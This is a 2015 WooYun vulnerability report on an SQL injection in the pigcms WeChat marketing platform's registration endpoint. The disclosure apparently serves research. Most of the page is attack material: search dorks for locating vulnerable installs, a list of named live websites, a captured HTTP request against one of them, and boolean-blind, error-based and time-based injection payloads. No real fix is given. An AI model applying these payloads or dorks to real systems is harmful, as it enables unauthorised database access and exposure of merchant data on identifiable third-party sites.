当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0100388

漏洞标题:pigcms微信公众营销平台通用SQL注入漏洞

相关厂商:pigcms

漏洞作者: 路人甲

提交时间:2015-03-10 13:55

修复时间:2015-04-30 18:48

公开时间:2015-04-30 18:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:13

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

某微信公众营销平台通用SQL注入漏洞

详细说明:

见乌云: WooYun: 某通用型微信公众平台SQL注入(泄露上万商家信息) 属于捡漏一处!
关键词:inurl:index.php?g=Home&m=Index&a=help
intitle:营销系统 inurl:login
漏洞位置:index.php?m=Index&a=reg(注册页面)

1.png


1.png


漏洞证明:

借用前人案例:
http://a.t2.weixinbiz.cn/
http://www.weixint.com/
http://wechat.dahailuo.com/
http://www.hohoxj.com/
http://guphoto.xf.sc.cn/
http://www.jpsbzr.com/
http://weixin.kfqd.cn/
http://www.iweichat.com/
http://wechat.dahailuo.com/
http://www.macheka.cn/
http://liemei.cedb.com/
这里以http://a.t2.weixinbiz.cn/index.php?m=Index&a=reg为例:
测试数据,截取数据包:

POST /index.php?m=Users&a=checkreg HTTP/1.1
Host: a.t2.weixinbiz.cn
Proxy-Connection: keep-alive
Content-Length: 151
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://a.t2.weixinbiz.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://a.t2.weixinbiz.cn/index.php?m=Index&a=reg
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: CNZZDATA5524076=cnzz_eid%3D2057590716-1425359086-http%253A%252F%252Fa.t2.weixinbiz.cn%252F%26ntime%3D1425359086; PHPSESSID=97d8b8f0cfa07313d01299087bc5760f; AJSTAT_ok_pages=2; AJSTAT_ok_times=2
username=admin%27&password=123456&repassword=123456&email=212312313%40qq.com&__hash__=563e40fffca54ef4dd9ac35d6c2af1b5_ba74dd678a656f8ee0b8e7223ce58417
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus
e (RLIKE)
    Payload: username=admin') RLIKE IF(8823=8823,0x61646d696e,0x28) AND ('WwRy'=
'WwRy&password=123456&repassword=123456&[email protected]&__hash__=563e40fffc
a54ef4dd9ac35d6c2af1b5_28360a5eeac616e09430aee305e702d9
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=admin') AND (SELECT 8242 FROM(SELECT COUNT(*),CONCAT(0x3a7
976633a,(SELECT (CASE WHEN (8242=8242) THEN 1 ELSE 0 END)),0x3a78716d3a,FLOOR(RA
ND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('yWZv'='yWZ
v&password=123456&repassword=123456&[email protected]&__hash__=563e40fffca54e
f4dd9ac35d6c2af1b5_28360a5eeac616e09430aee305e702d9
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=admin') AND SLEEP(5) AND ('afwa'='afwa&password=123456&rep
assword=123456&[email protected]&__hash__=563e40fffca54ef4dd9ac35d6c2af1b5_28
360a5eeac616e09430aee305e702d9


1.png


数据库信息:

1.png


其他如上!

修复方案:

如上

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝